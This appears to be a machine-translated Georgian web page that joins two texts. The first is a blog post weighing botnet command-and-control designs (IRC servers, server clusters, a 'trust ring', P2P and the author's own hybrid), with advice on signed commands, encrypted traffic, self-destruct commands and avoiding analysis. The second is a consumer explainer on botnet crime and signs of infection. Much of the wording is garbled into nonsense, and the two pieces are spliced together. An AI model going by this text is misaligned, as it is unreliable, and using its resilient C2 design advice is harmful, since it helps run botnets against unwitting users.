ბოტნეტი. როგორ იქმნება ბოტნეტები. დაცვა ბოტნეტებისგან. შექმენით თქვენი საკუთარი საბრძოლო ბოტნეტის კონტროლი IRC გაზომვის საშუალებით

ტყუილად არ გამოვაქვეყნე ჩემი შენიშვნები თანატოლთა ქსელების შესახებ. მკითხველთა კომენტარები კიდევ უფრო უარესი აღმოჩნდა. სუნი თავისთავად შთააგონებდა, რომ პირდაპირ რობოტს მოვშორებოდი. რა მოხდა - გასაკვირია ჭრილობის ქვეშ.

როგორც მცენარის სახელიდან ჩანს, დღევანდელი ენა მხოლოდ ბოტნეტებს ეხება. მოდით დავივიწყოთ ფაილების გაზიარება, პროქსი ქსელები, peer-to-peer ბლოგები და p2p ვალუტა ერთი საათის განმავლობაში.

სიტყვა „ბოტნეტი“ არაფერს ნიშნავს უკანონო. თუ მომხმარებელი ნებაყოფლობით ჩამოტვირთავს და დააინსტალირებს „ბოტს“ თავისი ტრაფიკისა და გამოთვლითი რესურსების სამეცნიერო პროექტის საჭიროებისთვის გადაცემის იდეით, ის ხდება ბოტნეტი. როგორც ჩანს, ბოტმასტერი სულაც არ არის ბოროტმოქმედი. 30 სტუდენტისგან შემდგარი ჯგუფი, რომელიც ჩართულია სამეცნიერო პროექტში, "ბოტმასტერი" კატეგორიაში.

1. ბოტნეტის მართვა სერვერის მეშვეობით

ბოტების მართვის უმარტივესი გზაა irc / http სერვერის გაშვება. ამ რობოტის მეშვეობით გაიცემა ბრძანებები და ამ რობოტიდან დაეხმარება მათი გამარჯვების შედეგის დადგენაში.

სულ პატარა :) ამ შემთხვევაში შესაძლოა ილუსტრაცია არ იყოს საჭირო, თორემ მინდა მოგამზადოთ იმ შოკისთვის, რომელსაც სხვა პატარები განიცდიან.

  • განხორციელება ძალიან მარტივია, განსაკუთრებით IRC გამოყენებისას.
  • Shvidka vidpovid სპამერების საძიებო რობოტები.
  • თქვენ შეგიძლიათ გასცეთ ბრძანებები როგორც ყველა ზომაზე, ასევე კონკრეტულ ბოტზე.
  • ვინაიდან ქსელი შედგება ასობით კვანძისგან, მას სჭირდება ერთი არხი DalNet-ში მის სამართავად. კიდევ უფრო დიდი თანხებისთვის, შეგიძლიათ იყოთ გულუხვი იაფი (დაახლოებით 300 რუბლი/თვეში) ვებ ჰოსტინგით.
  • Vypadku და HTTP-სერვერი აუცილებლად დაემშვიდობება ლამაზი UI-ს განვითარებას. ეს მნიშვნელოვანია, რადგან ჩვენ ვართ ვიკორისტი ბოტნეტი ნებისმიერ ვებ სერვისში.
  • ნავანტაჟენია სერვერზე. უდიდეს ბოტნეტებში კვანძების რაოდენობა მილიონობით არის. ასეთი არეულობა, ერთი სერვერი არ არის საკმარისი.
  • თუ სერვერთან არის პრობლემა (დაავარია firewall-ში, DDoS, ხანძარი მონაცემთა ცენტრში), firewall დასრულდება.
  • მარტივია ერთი სერვერის firewall. თქვენ შეგიძლიათ იმუშაოთ როგორც პროვაიდერად, ასევე Kaspersky Lab-ის პროდუქტებზე თქვენს კომპიუტერზე.
  • Botmaster-ის პოვნა საკმაოდ მარტივია. მას შემდეგ რაც დაივიწყებთ VPN-ს, შეამოწმეთ სტუმრები ფორმაში.
  • Vipadku z IRC, ბრძანებები მხოლოდ ბოტების ყურების ონლაინ რეჟიმში. თუ ბოტი ბრძანების გაგზავნის შემდეგ არხში ორ სტრიქონში შევა, ის იქნება „თემას მიღმა“.
  • ბოტების რაოდენობა და მათი IP-ები შეიძლება განისაზღვროს IRC არხზე შეერთებით. არხის პაროლით დაცვა არ დაეხმარება, რადგან დარჩენილი არხის გატეხვა ადვილია ბოტის კოდიდან.

2. კონტროლი IRC-ინტერფეისით

წინა მეთოდის ნაკლოვანებებთან ბრძოლის ლოგიკური გზაა არა მხოლოდ ერთი სერვერის, არამედ თაიგულის შექმნა. ჩემი აზრით, ფულის გამომუშავების უმარტივესი გზაა თქვენი IRC ლიმიტის გაზრდა. ამ შემთხვევაში, ყველა პასუხისმგებლობა სერვერებს შორის მონაცემთა გადაცემაზე ეკისრება IRC პროტოკოლს. ორივე მხრიდან არ იქნება განსხვავება თანაბარ და წინა გადაწყვეტილებებს შორის.

  • მარტივი განხორციელება, თუ თქვენ გჭირდებათ სერვერების დაყენება.
  • ბოტები ყოველთვის სწრაფად რეაგირებდნენ ბრძანებებზე.
  • თქვენ მაინც შეგიძლიათ გასცეთ ბრძანებები კონკრეტულ ბოტზე.
  • ყურადღების გაყოფა სერვერებს შორის, დაცვა DDoS-ისგან და ფორსმაჟორისგან. ათეული კარგი სერვერის გამოყენება შესაძლებელია მილიონი სპამის საძიებო რობოტის დასაპირისპირებლად.
  • თუ დაკარგავთ ზოგიერთ სერვერს, შეგიძლიათ წაშალოთ ისინი და შეცვალოთ ისინი.
  • როგორ მოვახდინოთ IRC ვიკორიზაციადა დადე ათასობით ბოტი ერთ არხზე დაჯდომაზე, რამდენიმე არხზე ვიკორისტი. ცხადია, სხვადასხვა ნაწილს შეიძლება მიეცეს სხვადასხვა ინსტრუქცია.
  • გქონდეთ შანსი იყოთ გულუხვი სერვერებით/VDS-ით.
  • თქვენ შეგიძლიათ ყველა სერვერის ფაირვოლინგი ერთდროულად და ბოტმასტერი ვერ შეძლებს მათ ჩანაცვლებას.
  • ბოტმასტერს ჯერ კიდევ სჭირდება უბრალოდ დამაგრება.
  • Vipadku z IRC, ბოტების რაოდენობა და მათი IP-ები ყველასთვის თვალსაჩინოა.
  • ბოტები, რომლებიც მხოლოდ არხზე მოვიდნენ, თემაში არ არიან.

ტერმინი ნდობის ბეჭედი (ნდობის ბეჭედი) პირველად შემხვდა მეგობრის ნიკოლასისგან კომენტარებში წინასწარ. საუბარია ბოტნეტის ნაწილზე "სერვერების" ფუნქციის დაყენებაზე.

  • სერვერები არ არის საჭირო.
  • ტრასტრინგი შეიძლება შედგებოდეს ასობით კვანძისგან. ასეთი რაოდენობის irc / http სერვერების ამაღლება და კონტროლი ადვილი არ არის.
  • ტრასტრინგთან კავშირის გამუდმებით გათიშვა ბიჭების ბრალი არ არის. თქვენ უნდა შეამოწმოთ ყოველ 5-10 წუთში, თუ ახალი ბრძანებები არ გამოჩნდება. კანის ბრძანება არის დედა TTL-ის დამნაშავე, რომლის სიგრძე ინახება ტრასტრინგში.
  • "სერვერების" დიდი რაოდენობა უზრუნველყოფს ბარიერის სტაბილურობას ყველა სახის გაჭირვებამდე. თუ ბეჭდის ნაწილი ჩანს, ბოტმასტერს შეუძლია გასცეს ბრძანება ახალი თემის შესაქმნელად. ალტერნატიულად, შეიძლება შეიქმნას თავად რგოლის კვანძები (საჭიროა ციფრული ხელმოწერები და ერთი კვალის სარგებელი).
  • დაე, კავშირი შედგებოდეს 512 კვანძისგან, 50%-ზე მეტი მუდმივად ონლაინ რეჟიმშია. თუ მინიმუმ 1,000,000 ბოტია და მათი სკინები მუდმივად ონლაინ რეჟიმშია, მინიმუმ 4000 სპამის საძიებო რობოტი გაიგზავნება თითოეულ ბოტზე. როდესაც ბოტი წერს ბრძანებებს (ან შედეგის გაგზავნისას) ყოველ 10 წუთში ერთხელ, რგოლები წარმოიქმნება საშუალოდ 7-ჯერ. საკმაოდ ცოტაა ამ ზომის ჰემისთვის, არა?
  • ყველა ბოტის ზუსტი ჩამონათვალის მიღება მხოლოდ ბოტმასტერს შეუძლია.
  • თქვენ შეგიძლიათ გასცეთ ბრძანებები კონკრეტულ ბოტს ან სპამის საძიებო რობოტების ჯგუფს.
  • ბოტების რეაქცია ბრძანებებზე.
  • მნიშვნელოვანია იცოდეთ ბოტმასტერი.

ერთადერთი მინუსი, რასაც მე ვხედავ, არის განხორციელების სირთულე.

4. შესატყვისი ზომები

ინტერნეტის მიხედვით, P2P ბოტნეტები ამ დროისთვის სულ უფრო პოპულარული ხდება. მათ შორის უდიდესი პატივისცემაა. ასეთი მასშტაბის კანის კვანძმა იცის მხოლოდ რამდენიმე "ზენაური" კვანძი. Botmaster აგზავნის ბრძანებებს საზღვრის რამდენიმე კვანძზე, რის შემდეგაც იგი გადადის ერთი მხრიდან მეორეზე.

მეზობლების სია ბოტებს ერთხელ უჩვენებენ სპეციალურ სერვერზე. მე შემიძლია, მაგალითად, გავტეხო საიტი. აღარ არის საჭირო სერვერის შეფერხება; ის მხოლოდ ბოტნეტში კვანძების დამატებამდე იქნება საჭირო.

  • განხორციელება გაცილებით მარტივია, მაგრამ წინა პლანზე.
  • მინიმალური ყურადღება საზღვრის ყველა კვანძზე. ბოტნეტის ზომა პრაქტიკულად შეუზღუდავია.
  • წინააღმდეგობა DDoS-ის მიმართ, კვანძის გათიშვა და ა.შ. პრაქტიკულად შეუძლებელია p2p ბოტნეტის firewall.
  • არ არსებობს მუდმივი კავშირები, როგორც IRC-ის შემთხვევაში.
  • სერვერი მჭირდება, არ ინერვიულო.
  • ვუზლი ყოველ საათში კვდება, რაც საზღვრის დაკავშირებაზეა მითითებული.
  • ყველა ბოტის სიის მისაღებად, თქვენ გჭირდებათ, მაგალითად, მისცეთ ბრძანება, გადავიდნენ თავიანთ ვებსაიტზე. ამ ტიპს არ აქვს გარანტია, რომ სიას ნახულობს მხოლოდ ბოტმასტერი.
  • მომღერალ კვანძზე ბრძანების მისაცემად, თქვენ უნდა გაგზავნოთ ყველა კავშირი ან პირდაპირ დაუკავშირდეთ კვანძს.
  • ბოტების პასუხი ბრძანებებზე ძლიერია.
  • "გრძელი" ბრძანების გასაგზავნად, მაგალითად, URL-ების სიით, თქვენ სწრაფად უნდა დაუკავშირდეთ მესამე მხარის სერვერს, წინააღმდეგ შემთხვევაში ბოტების რეაქცია კიდევ უფრო უარესი იქნება.
  • უფრო ადვილია ბოტმასტერის გაცნობა, პირველ რიგში, ნებისმიერი სერვერის ვიკორისტანის გულისთვის.

მე ნამდვილად შემიძლია წყალობა, მაგრამ ჩემი აზრით p2p ბოტნეტები ბევრად უარესია ვიდრე ნდობა. იქნებ ანტივირუსების გამყიდველებმა ისაუბრონ ამაზე?

5. ყოვლისმომცველი გადაწყვეტილებები

ახალი და კარგის პოვნის ერთ-ერთი გზა ძველის შეცვლაა. მათ გააერთიანეს ტელეფონი, კომპიუტერი, მაგნიტოფონი, კამერა და ვიდეოკამერა - წაართვეს სმარტფონი. აღარავინ იყენებს კომპიუტერს ან კლიმატ კონტროლს მანქანაში. მაცივარზე მაგნიტს ვამაგრებთ იოგურტის კანზე და გაყიდვა გაფრინდება.

მნიშვნელოვანია გვახსოვდეს, რომ თუ რაიმეს აღმოვაჩენთ არც თუ ისე შორს, ჩვენ ვერაფერს წავართმევთ განსაკუთრებულს. გენეტიკური ალგორითმები ვარაუდობენ, არა? როგორც ჩანს, კარგი იდეაა - p2p ბოტნეტი, სადაც მეზობლების აღიარება მიუთითებს ნდობაზე. მაშინ ჩვენ არ გვჭირდება სერვერი!

მაგრამ ამ ტიპის ზრდაში არის განხორციელების სირთულე, არ აქვს მნიშვნელობა რა. p2p ბოტნეტის პრობლემების გადაჭრა გადაუჭრელი დარჩება. ვიგრაში უმნიშვნელოა, რაჰუნოკი 1:1.

ცოტა ხანი ქაღალდთან და ცხვართან ჯდომის შემდეგ, იდეა მომივიდა. რამდენადაც ვიცი, აქამდე არ გაჟღერებულა და პირველი ვარ, ვინც ასეთი აზრი მომივიდა. ChSV პლუს 100.

კარგად, თუ საზღვარს ექნება ორი ეტაპი - "აქტიური" და "პასიური". პასიურ რეჟიმში ბოტნეტი მუშაობს p2p სქემით. Botmaster აგზავნის ბრძანებას "მობილიზება ჯარები" და ეს იქცევა trastring. მისი გუნდისთვის ბოტმასტერს მოეთხოვება მიუთითოს ტრასტრინგის კვანძები და საათი, რათა შეცვალოს თავისი სადგური. უფრო დიდი რგოლი რომ გქონდეთ, შეგიძლიათ რამდენიმე რობოტს უბრძანოთ დაასახელონ თავიანთი მეზობლები. შემდეგ ყველა ბრძანება გადაიცემა ტრასირების გზით. ის ასევე ადასტურებს ახალი კვანძების "მეზობლების" აღიარებას. თუ TTL ბეჭედი არ არის საკმარისი, შეგიძლიათ გასცეთ ბრძანება "განაგრძეთ აქტიური სტანი".

ასეთი ბოტნეტი არ შეამცირებს p2p საზღვრის დღიურ მინუსს და ექნება ტრასტრინგის ყველა უპირატესობა, ასევე შემდეგი:

  • გაზრდილი წინააღმდეგობა DDoS შეტევებისა და კიდეების ფილტრების მიმართ, როგორიცაა p2p ზღვარი.
  • რესურსების მინიმალური მოხმარება ბოტების მიერ უსაქმურობის ერთი საათის განმავლობაში. Botmaster-ს არ სჭირდება threading სადგურის დაყენება და ახალი კვანძის არჩევა ახლისთვის.
  • როდესაც კავშირი იქმნება, არჩეულია მხოლოდ ის კვანძები, რომლებიც ამჟამად არის ონლაინ. ორივე შეუერთდება რინგს პირველ გამოცდაზე (რა დროს).
  • „მეზობლების“ სია პერიოდულად განახლდება. მთელმა ბოტნეტმა იცის ყველა IP კვანძი, რომელიც შედის საათის რგოლში. ასე რომ, შეწყვიტეთ ამ გემების პატივისცემა, რადგან ზოგიერთი ამჟამინდელი ხომალდი დიდი ხანია არ გამოჩენილა.

და ერთადერთი ნაკლი, რასაც აქ აღვნიშნავ, არის განხორციელების სირთულე. მაგრამ ეს ნამდვილად არ არის პრობლემა.

6. მნიშვნელოვანია გვახსოვდეს რა

აქამდე მე ვისაუბრე ბოტნეტის მართვის რომელიმე მეთოდის სიმძლავრის სხვადასხვა ასპექტზე. სლაიდი მათ მიმართ პატივისცემას გამოხატავს.

  • ზოგიერთ კვანძს არ შეუძლია შემომავალი კავშირების მიღება firewall-ის ან NAT-ის მეშვეობით. მინიმუმ, ბოტის დაწერისას ფრთხილად უნდა იყოთ. მაგალითად, p2p განზომილებაში ბრძანებების გაფართოებით, თავად ბოტი პერიოდულად უნდა დაუკავშირდეს მეზობლებს, ვიდრე მათგან ბრძანებების შემოწმება.
  • ეს გამომდინარეობს იქიდან, რომ ყველა ბრძანება, რომლის მოსმენას ცდილობს საზღვარი, ისმის. მინიმუმ, შეგიძლიათ შეცვალოთ ბოტის კოდი ამ მიზნებისთვის. Prote-ს შეუძლია იგრძნოს დაშიფვრა მთელი ტრაფიკი, რომელიც გადაიცემა ქსელის საშუალებით. მინიმუმ, ეს გაართულებს ბოტნეტის ანალიზს.
  • ყველა botmaster ბრძანება უნდა იყოს ციფრული ხელმოწერილი. პაროლები არასწორია, ამიტომ ისინი შეიძლება დაიკარგოს.
  • ვინაიდან დანერგვაზე ვსაუბრობ, ვგულისხმობ, რომ ნებისმიერ შემთხვევაში, ნებისმიერი ბოტი პასუხისმგებელია მინიმუმ სამი ბრძანების გადაცემაზე - ბოტების განახლებაზე, botmaster გასაღების განახლებაზე და ყველა ღონისძიების თვითგანადგურებაზე.
  • მერეჟას ჰყავს „სპიგუნსკი“ ნოდი. ზოგიერთი მათგანი შედის ნდობაში. თუმცა, ჩვენ არ ვიცით რა მიზნებს იძიებენ „ჯაშუშები“ - ეს შეიძლება მოიცავდეს botmaster-ის IP-ის იდენტიფიცირებას, ბრძანების ხაზების ნახვას, მეთვალყურეობის დამყარებას, ბოტნეტის კონტროლის აღებას და ა.შ. ზოკრემა, რაც ნიშნავს, რომ რგოლთან შეერთებისას უნდა აირჩიოთ შესაბამისი დოზა და არ გააგრძელოთ სმა იმავე საათში.
  • ტრასტრინგის პატარა კვანძები აკავშირებს კანს კანთან, მაგრამ ბევრად უფრო პრაქტიკულია რგოლის დანერგვა ერთი შეხედვით პატარა p2p-ინტერფეისის გარშემო, "მეზობლების" პრინციპის დაცვით.

მე ასევე აღვნიშნავ, რომ გადაწყვეტილებები 1 და 2 (სერვერი, ბევრი სერვერი) აღმოფხვრის უამრავ მინუსს და იძენს რამდენიმე პლიუსს 3 გადაწყვეტაზე (ტრასტრინგი), როდესაც გამოიყენება HTTP პროტოკოლი. კიდევ ერთხელ გადაახვიეთ ეს პუნქტები, რომ გაიგოთ რას ვგულისხმობ.

7. ვისნოვკი

მცირე პროექტებისთვის, კარგი გადაწყვეტილებები მოიცავს IRC ვებსაიტს. მაგალითად, თუ გსურთ შექმნათ თქვენი საკუთარი პატარა ქსელი ბუღალტრული აღრიცხვის განყოფილებებისთვის, დააინსტალირეთ ბოტი სახლის კომპიუტერზე, ლეპტოპზე, ნეტბუქზე ან სამუშაო კომპიუტერზე (როგორც კომპანიის პოლიტიკა იძლევა) და შექმენით ქსელი DalNet-ის მეშვეობით. საჭიროების შემთხვევაში, მოგვიანებით ღონისძიება შეიძლება "გადატუმბოს" ტრასტრინგზე. შენ მეორე გუნდს გადაიყვან, არა?

ვინაიდან ბოტნეტს სჭირდება მშობლიური ვებ ინტერფეისი, შესაძლებელია დამატებითი პროგრამის დაწერა, რომელიც შეაგროვებს ბრძანებებს ვებ სერვერიდან და გაუგზავნის მათ IRC-ში. მაინც შეხედეთ ამ მიდგომას.

უნივერსალური გადაწყვეტილებები მოიცავს ტრასირებას და p2p + ტრასირებას. ასეთი ქსელები იდეალურად იმუშავებს იმისდა მიუხედავად, რამდენი კვანძი აქვთ, 1 თუ 1,000,000, გამოყოფილი სერვერების საჭიროების გარეშე.

მიუხედავად იმისა, რომ მნიშვნელოვანია, რომ „სუფთა p2p“-ს აქვს აშკარა ხარვეზები რგოლთან გასწორებაში, გაუგებარია, რატომ არის მნიშვნელოვანი შემდგომი გადაწყვეტილებების მიღება. ბოტებს, რომლებიც ქმნიან ჩარჩოს, აქვთ ბევრი საინტერესო ფუნქცია. რატომ არ დავამატოთ კიდევ ერთი მცირე დატვირთვა - ქსელის მობილიზება ნდობაში?

ღერძი, ალბათ, და ეს ყველაფერი. მე ვიქნები გასხივოსნებული თქვენი კომენტარებით. განსაკუთრებით კრიტიკით, ტექსტის უზუსტობებზე / ზესიზუსტეებზე მითითებით და მათ მიერ განადგურებული დისკიდან თქვენი იდეებით.

დღეს ბოტნეტები კიბერ კრიმინალების ერთ-ერთ მთავარ იარაღად იქცა. ComputerBild გვიჩვენებს, თუ რას აკეთებენ ბოტნეტები, როგორ მუშაობენ ისინი და როგორ მოიპაროთ თქვენი კომპიუტერი ზომბების ზონაში მოხვედრისგან.

ბოტნეტი, ან ზომბი ქსელი, არის კომპიუტერების სისტემა, რომელიც ინფიცირებულია საზიზღარი პროგრამით, რომელიც საშუალებას აძლევს მავნე ადამიანებს მოიპარონ სხვა ადამიანების მანქანები მათი უფროსების ცოდნის გარეშე. ბოლო წლებში ზომბების თავდასხმები კიბერკრიმინალებისთვის შემოსავლის სტაბილურ წყაროდ იქცა. მუდმივად დაბალი ხარჯები და ბოტნეტების მართვისთვის საჭირო მინიმალური ცოდნა ხელს უწყობს პოპულარობის ზრდას და, შესაბამისად, ბოტნეტების რაოდენობას. DDoS შეტევებისა და სპამის საწვავის საშუალებით, რომლებიც მოქმედებენ როგორც ზომბები, კრიმინალები და მათი აგენტები ათასობით დოლარს შოულობენ.

ჩემი კომპიუტერი ინფიცირებულია ბოტით?

საკვების შესახებ მოხსენება ადვილი არ არის. მეორეს მხრივ, პრაქტიკულად შეუძლებელია ბოტების ინტეგრირება ჩვეულებრივ კომპიუტერში, რადგან შეუძლებელია სისტემის სიჩქარის კოდის ჩვენება. აქ არის ნიშანი, რომელიც აჩვენებს, რომ სისტემაში არის ბოტი:

უცნობი პროგრამები ცდილობენ დაამყარონ კავშირი ინტერნეტთან, რასაც პერიოდულად ადასტურებს firewall ან ანტივირუსული პროგრამა;

ინტერნეტ ტრაფიკი კიდევ უფრო დიდი ხდება, თუმცა თქვენ ცდილობთ მისგან თავის დაღწევას;

გაშვებული სისტემური პროცესების სიას აქვს ახლები, რომლებიც ნიღბიანია Windows-ის ორიგინალური პროცესების ქვეშ (მაგალითად, ბოტს შეიძლება ეწოდოს scvhost.exe - სახელი ძალიან ჰგავს Windows სისტემის პროცესის სახელს svchost.exe; რთულია. რომ აღინიშნოს განსხვავება, წინააღმდეგ შემთხვევაში შესაძლებელია).

ბოტნეტები იზრდება

ბოტნეტები იქმნება ფულის გამომუშავებისთვის. თქვენ შეგიძლიათ იხილოთ კომერციულად მომგებიანი ზომბების მენეჯმენტის რამდენიმე სფერო: DDoS შეტევები, კონფიდენციალური ინფორმაციის შეგროვება, სპამის გაგზავნა, ფიშინგი, სპამის ძებნა, სპამის დაწკაპუნება და ა.შ. თქვენ უნდა გაითვალისწინოთ, რომ ბოტნეტი საშუალებას მოგცემთ განახორციელოთ ყველა სახის აქტივობა ერთდროულად.

DDoS შეტევა (ინგლისური Distributed Denial-of-Service-დან) არის თავდასხმა კომპიუტერულ სისტემაზე, მაგალითად, ვებსაიტზე, რათა სისტემა "დაცემამდე" მიიყვანოს ისე, რომ ის ვეღარ შეძლებს მიიღოს და დაამუშავოს მოითხოვოს ლეგიტიმური კორისტუვაჩები. DDoS შეტევის განხორციელების ერთ-ერთი ყველაზე გავრცელებული მეთოდია მსხვერპლის კომპიუტერზე ან საიტზე რიცხვითი მოთხოვნების გაგზავნა, რაც იწვევს სერვისის გამოჩენას, რადგან თავდასხმული კომპიუტერის რესურსები არასაკმარისია ყველა მოთხოვნის დასამუშავებლად, რაც შეიძლება მოიძებნოს. DDoS შეტევები სერიოზული საფრთხეა ჰაკერებისთვის და ბოტნეტი იდეალური ინსტრუმენტია მათი განსახორციელებლად.

DDoS თავდასხმები შეიძლება იყოს არასამართლიანი კონკურენციის ფორმა ან კიბერ ტერორიზმის აქტი. ბოტნეტის ბოსს შეუძლია შეასრულოს სერვისი ყველაზე დელიკატური საწარმოსთვისაც კი - განახორციელოს DDoS შეტევა მისი კონკურენტის ვებსაიტზე. რესურსზე თავდასხმა ხდება ასეთი თავდასხმის შემდეგ „ქვედა“, თავდასხმის მეთაური ართმევს დროის უპირატესობას, ხოლო კიბერკრიმინალი - უფრო მოკრძალებულად (ან არც ისე დიდად) ქალაქს.

ანალოგიურად, თავად ბოტნეტების ლიდერებს შეუძლიათ DDoS თავდასხმების ვიკორიზირება დიდი კომპანიებისგან ფულის გამოსატანად. მიუხედავად იმისა, რომ კომპანიებს პატივს სცემენ კიბერშეტევებისგან უკეთესი აღდგენისთვის, DDoS თავდასხმების შედეგად აქტივების ლიკვიდაცია შეიძლება ძვირი იყოს. მაგალითად, 2009 წელს, ერთ-ერთი უდიდესი ჰოსტერი, GoDaddy.com, დაემორჩილა DDoS შეტევას, რის შედეგადაც მის სერვერებზე განთავსებული ათასობით საიტი მიუწვდომელი გახდა გამოსაყენებლად. მასპინძლის ფინანსური ხარჯები დიდი იყო.

2007 წლის ბოლოს განხორციელდა არაერთი თავდასხმა root DNS სერვერებზე, რამაც მთლიანად შეარყია მთელი ინტერნეტის ნორმალური ფუნქციონირება. ნაკლებად სავარაუდოა, რომ ამ თავდასხმებს მოჰყვეს მსოფლიო ინტერნეტის კოლაფსი და ზომბების შექმნა შესაძლებელია მხოლოდ იმ ადამიანების გონებისთვის, რომლებსაც აქვთ აქტიური და ნორმალურად მოქმედი ინტერნეტი. ეს ყველაზე მეტად ჰგავდა ზომბების სიძლიერისა და შესაძლებლობების დემონსტრირებას.

ამ DDoS შეტევების სერვისების რეკლამები ღიად არის განთავსებული მსგავსი თემების ბევრ ფორუმზე. თავდასხმების ფასები მერყეობს 50-დან რამდენიმე ათას დოლარამდე უწყვეტი DDoS ბოტნეტის რობოტების მისაღებად. ვებგვერდის www.shadowserver.org-ის მიხედვით, 2008 წელს განხორციელდა თითქმის 190 ათასი DDoS თავდასხმა, საიდანაც კიბერ კრიმინალებს თითქმის 20 მილიონი დოლარის შოვნა შეძლეს. ბუნებრივია, ამ თანხაში არ შედის შანტაჟიდან მიღებული შემოსავალი, რადგან მისი აღდგენა უბრალოდ შეუძლებელია.

კონფიდენციალური ინფორმაციის შეგროვება

კონფიდენციალური ინფორმაცია, რომელიც ინახება ტრეიდერების კომპიუტერებში, მომავალში ისინი დაიჭერენ კრიმინალებს. ყველაზე დიდი ინტერესია საკრედიტო ბარათის ნომრები, ფინანსური ინფორმაცია და პაროლები სხვადასხვა სერვისებისთვის: ელ.ფოსტის ანგარიშები, FTP სერვერები, მყისიერი მესინჯერები და ა.შ. ამ შემთხვევაში, დღევანდელი ცუდი პროგრამები თავდამსხმელებს საშუალებას აძლევს აირჩიონ იგივე მონაცემები, რაც მათ სჭირდებათ, რათა დააინსტალირონ დანამატი მოდული კომპიუტერზე.

კრიმინალებს შეუძლიათ ან გაყიდონ მოპარული ინფორმაცია ან გამოიყენონ ის საკუთარი ინტერესებისთვის. მერეჟის ციფრულ ფორუმებზე ყოველდღე ასობით განცხადება ხდება საბანკო ანგარიშების გაყიდვის შესახებ. საგადასახადო ანგარიშის ხარჯები იქნება რამდენიმე პენი თითო საბანკო ანგარიშზე და იქნება 1-დან 1500 დოლარამდე ბანკში. დასკვნა ის არის, რომ კონკურენტული ბრძოლის დროს კიბერკრიმინალები, რომლებიც ამ ტიპის ბიზნესით არიან დაკავებულნი, ცდილობენ ფასების შემცირებას. ბევრი ფულის შოვნისთვის საჭიროა ახალი მონაცემების სტაბილური შემოდინება და ამისთვის არის ზომბების ლიმიტის სტაბილური ზრდა. ფინანსური ინფორმაცია განსაკუთრებით სასარგებლოა კარდერებისთვის - კრიმინალები, რომლებიც საქმე აქვთ საბანკო ბარათების დეტალებს.

რამდენად წარმატებულია ასეთი ოპერაციები, შეიძლება ვიმსჯელოთ ბრაზილიელი კიბერ კრიმინალების ჯგუფის ისტორიით, რომლებიც დააკავეს ორი მიზეზის გამო. მათ შეძლეს რიგითი მოვაჭრეების საბანკო ანგარიშებიდან 4,74 მილიონი დოლარის ამოღება მათი კომპიუტერებიდან ინფორმაციის მოპარვით. გარდა პერსონალური მონაცემებისა, რომელსაც პირდაპირი კავშირი არ აქვს ვაჭრის ფულთან, არის თაღლითობები და ბოროტმოქმედება, როგორიცაა დეტალურ დოკუმენტებთან ურთიერთობა, ყალბი საბანკო ანგარიშების აღმოჩენა, უკანონო ქმედებების განხორციელება და ა.შ.

ბოტნეტების ინფორმაციის შეგროვების კიდევ ერთი გზაა ელ.ფოსტის მისამართებიდან და საკრედიტო ბარათის ნომრებისა და ბიზნეს ჩანაწერების ჩანაცვლებით, ანონიმური ელ.ფოსტის მისამართები შეიძლება ამოღებულ იქნეს ერთი ინფიცირებული კომპიუტერის მისამართების წიგნიდან. არჩეული მისამართები ნაჩვენებია გასაყიდად და ნებისმიერ შემთხვევაში მეგაბაიტზე. ასეთი „პროდუქტების“ მთავარი მყიდველები არიან სპამერები. მილიონი ელექტრონული ფოსტის მისამართებით სია 20-დან 100 დოლარამდე ღირს, სპამერებს კი სთხოვენ გაგზავნონ წერილი იმავე მილიონ მისამართზე - 150-200 დოლარი. ვიგოდა აშკარაა.

მოსახლეობა ასევე სარგებლობს სხვადასხვა ფასიანი სერვისებისა და ონლაინ მაღაზიების ღრუბლოვანი ჩანაწერებით. გიჟურად, ისინი საბანკო ჩანაწერებზე იაფია და მათი განხორციელება დაკავშირებულია სამართალდამცავი ორგანოების ხელახალი გამოძიების დაბალ რისკთან.

დღეს მილიონობით სპამი შეტყობინება მოგზაურობს მთელ მსოფლიოში. არასასურველი ფოსტის მიღება მიმდინარე ბოტნეტების ერთ-ერთი მთავარი ფუნქციაა. კასპერსკის ლაბორატორიის თანახმად, სპამის დაახლოებით 80% გადადის ზომბი ბარიერების მეშვეობით. კანონმორჩილი მოვაჭრეების კომპიუტერებიდან იგზავნება მილიარდობით ფურცელი „ვიაგრის“ რეკლამებით, ძვირადღირებული წიგნების ასლებით, ონლაინ კაზინოებით და ა.შ, რომლებიც ბლოკავს საკომუნიკაციო არხებს და ფოსტის ეკრანებს. ამ გზით ჰაკერები უდანაშაულო ადამიანების კომპიუტერებს საფრთხის ქვეშ აყენებენ: მისამართები, საიდანაც დისტრიბუცია ხორციელდება, ანტივირუსული კომპანიების შავ სიაშია შეტანილი.

ცოტა ხნის წინ, თავად სპამის სერვისების სფერო გაფართოვდა: გამოჩნდა ICQ სპამი, სპამი სოციალურ ქსელებში, ფორუმებსა და ბლოგებში. და ეს არის ბოტნეტების ავტორიტეტების „დამსახურება“: ასევე საკმაოდ რთულია ბოტის კლიენტისთვის დამატებითი მოდულის დამატება, რომელიც ხსნის ჰორიზონტს ახალი ბიზნესისთვის ლოზუნგებით „სპამი ფეისბუქზე“ შაბლონზე. იაფად“. სპამის ფასები განსხვავდება სამიზნე აუდიტორიის ზომისა და მისამართების რაოდენობის მიხედვით, რომლებზეც მიწოდება ხორციელდება. ფასების ზრდა მიზნობრივი სადისტრიბუციო ხაზებისთვის - 70 დოლარიდან ასობით ათასი მისამართისთვის 1000 დოლარამდე ათობით მილიონი მისამართისთვის. გასული წლის განმავლობაში სპამერებმა სიების გაყიდვიდან თითქმის 780 მილიონი დოლარი გამოიმუშავეს.

საძიებო სპამის შექმნა

ბოტნეტების ზრდის კიდევ ერთი ვარიანტია საძიებო სისტემებში საიტების პოპულარობის გაზრდა. საძიებო სისტემის ოპტიმიზაციაზე მუშაობისას, რესურსების ადმინისტრატორები ცდილობენ გააუმჯობესონ საიტის პოზიცია ძიების შედეგებში, რადგან უფრო მეტი ადამიანი შეძლებს საიტზე წვდომას საძიებო სისტემების საშუალებით და, შესაბამისად, უფრო სავარაუდოა, რომ ვლასნიკს ხელი მიუწვდება საიტზე, მაგალითად, გაყიდვაში. სარეკლამო სივრცე საიტებზე. ბევრი კომპანია უხდის გროშებს ვებმასტერებს, რათა მათი საიტი საძიებო სისტემებში პირველ პოზიციაზე მიიყვანონ. ბოტნეტის ლიდერები მიჰყვებოდნენ თავიანთ ტაქტიკას და ავტომატიზირებდნენ ძიების ოპტიმიზაციის პროცესს.

